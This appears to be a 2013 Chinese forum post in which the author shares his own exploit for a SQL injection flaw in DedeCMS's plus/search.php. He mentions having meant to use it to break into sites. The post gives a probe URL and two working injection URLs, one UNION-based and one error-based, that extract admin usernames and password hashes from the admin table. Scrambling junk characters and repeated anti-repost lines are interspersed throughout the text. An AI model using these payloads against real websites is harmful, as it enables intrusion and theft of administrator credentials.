转载不加作者名的没JJ0 F! X% Y! P+ ^1 b$ W, u# L. @, q+ k
9 d& t" H V! G0 o, X) D
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。" i. z5 a9 @' z( P
7 M9 R5 E! K+ A; \) n3 B
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
- ~, ^3 T0 Q% J# c
# ^4 E& }; G+ Y9 `) O2 T我一般是这样测试的:: s' h. F; r9 ]: u
$ p1 ^% d) t! E' l/ E2 ` ]提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a( k: e, q, B& {9 |% M; q( |+ ]
4 i1 l* |) }) H8 c3 v. W
转载不加作者名的没JJ
9 g: G: _, s0 u4 R3 d- v# C+ ]& w e8 j" T; E: {7 t
作者:鬼哥0 F/ i! J6 A4 @9 u9 l" l
+ r* E0 C' a9 q5 I. y9 B: u
9 r4 B `! \- i
- z" S7 \' w. c) k. a看结果如果提示5 K. U j8 k+ L2 P6 J; e5 @
5 t! Y& \, x. v3 R% P) Q' a
Safe Alert: Request Error step 2 !+ O# k1 ^- r0 |: z/ i" n
3 r7 F9 k( ]6 Q9 j那么直接用下面的exp
! F! M3 T) |% ?$ ~
: o/ `; d R; z5 f; x8 Oxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a) D" R1 F4 m+ ]9 K7 m
# `9 n& ^# Q& b, Y$ x/ Y# Q5 s2 c0 r6 x% m! k
看结果如果提示
( q8 L6 G e( S+ p2 m) `, M, ?* A8 `! }( H3 B& v5 |" Q4 x
Safe Alert: Request Error step 1 !
- e+ Q# O5 H, b9 b. |, I& y$ s4 @
; a2 ?! q, J" S/ P2 A. S+ c% L" I那么直接用下面的exp0 @$ M( X+ V- O' m
b3 D- y/ B. t3 mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
! [( ]( x$ {0 x# { Z! C8 L0 E9 s$ t6 _; L2 g
/ O" L- [, q! p如果正常显示证明漏洞不存在了。8 |! `1 w8 Q3 N Z" i0 {2 Z
3 y7 y7 i; d1 O) D+ A. h2 }转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对